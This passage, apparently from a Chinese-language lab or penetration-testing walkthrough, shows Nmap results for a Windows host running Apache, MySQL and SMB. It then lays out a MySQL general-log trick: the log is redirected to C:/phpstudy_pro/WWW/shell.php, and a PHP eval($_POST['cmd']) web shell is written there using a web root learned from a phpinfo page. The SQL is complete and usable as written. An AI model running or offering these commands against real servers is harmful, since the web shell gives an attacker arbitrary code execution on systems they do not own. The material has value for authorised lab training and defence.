Nmap scan report for 192.168.242.245 Host is up (0.020s latency). Not shown: 65523 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: GOD) 1025/tcp open msrpc Microsoft Windows RPC 1026/tcp open msrpc Microsoft Windows RPC 1027/tcp open msrpc Microsoft Windows RPC 1028/tcp open msrpc Microsoft Windows RPC 1029/tcp open msrpc Microsoft Windows RPC 1030/tcp open msrpc Microsoft Windows RPC 3306/tcp open mysql MySQL (unauthorized) 65534/tcp open ssh (protocol 2.0) Device type: firewall Running (JUST GUESSING): Fortinet embedded (88%) OS CPE: cpe:/h:fortinet:fortigate_200b Aggressive OS guesses: Fortinet FortiGate 200B firewall (88%) No exact OS matches for host (test conditions non-ideal). Network Distance: -7 hops Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 82.37 seconds
转变思路,开启 mysql 日志查询,访问日志获得 shell,这里我们在80 页面的 phpinfo 探针获得了绝对路径C:/phpstudy_pro/WWW
1 2 3 4
SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = 'C:/phpstudy_pro/WWW/shell.php'; SELECT '<?php eval($_POST["cmd"]); ?>'; SET GLOBAL general_log = 'OFF';